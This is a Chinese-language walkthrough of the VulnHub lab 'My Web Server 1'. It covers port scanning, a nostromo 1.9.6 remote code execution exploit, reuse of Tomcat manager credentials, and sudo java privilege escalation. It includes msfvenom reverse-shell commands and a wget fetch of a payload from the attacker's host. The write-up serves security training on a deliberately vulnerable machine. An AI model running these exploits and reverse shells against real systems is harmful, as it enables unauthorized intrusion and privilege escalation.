Get Box:https://www.vulnhub.com/entry/my-web-server-1,463/
下载好OVF后直接导入虚拟机即可
不错可以直接看到IP,那么就打开kali linux开始吧
打开卡里二话不说直接一顿NMAP
可以很清楚的看到22,80,2222,3306,8009,8080,还有8081端口开放
查看80端口 还有8080 80801 2222
随便尝试一下看看是否存在默认密码等
很明显失败了
再看看8081端口
类似于一个博客吧
再看看2222端口
哦天呐太多好看的小姐姐了吧
也是一个类似博客的网页
那么现在就直接进入正题吧通过dirb nikto searchsploit等工具的信息收集发现searchsploit发现2222号端口的nostromo1.9.6有远程代码执行漏洞
dirb大量的扫描结果
nikto扫描结果
Searchsploit扫描结果
关于这个nostromo我在看雪论坛也发现一篇翻译的文章 有兴趣可以去看看(https://bbs.pediy.com/thread-256798.htm)
首先cp
直接python会报错 我开始还以为是程序问题 后来发现直接注释掉就行
用法比较简单就是IP +端口+命令
先试试python 47837.py 192.168.0.100 2222 whoami
python 47837.py 192.168.0.100 2222 id
那么先GETSHELL吧
用kali自带的
改自己卡里IP和你要的端口 随意奥
启动阿帕奇
Nc start
然后python -c import“pty;pty.spawn(‘/bin/bash’)
通过查看tomcat-users.xml可以发现TOMCAT的管理后台密码
msfvenom生成一个war
然后上传即可
然后访问http://192.168.0.100:8080/exp/
现在已经切换到了TOMCAT用户 其实本来不想这么麻烦的 只是我试了一下直接切换TOMCAT用户 能用到的密码都失败了
Sudo -l
msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.108 LPORT=7775 -f jar > expjar.jar
启动NC监听并把生成的jar复制到var/www/html目录下
Wget http://192.168.0.108/expjar.jar
然后sudo /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java -jar ./expjar.jar
完!
(注:如文章内有打错的字或者有不同看法的可以评论指出!谢谢)
博客:Blog.CatGames.cn
邮箱:root@R0inSecurity.com
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法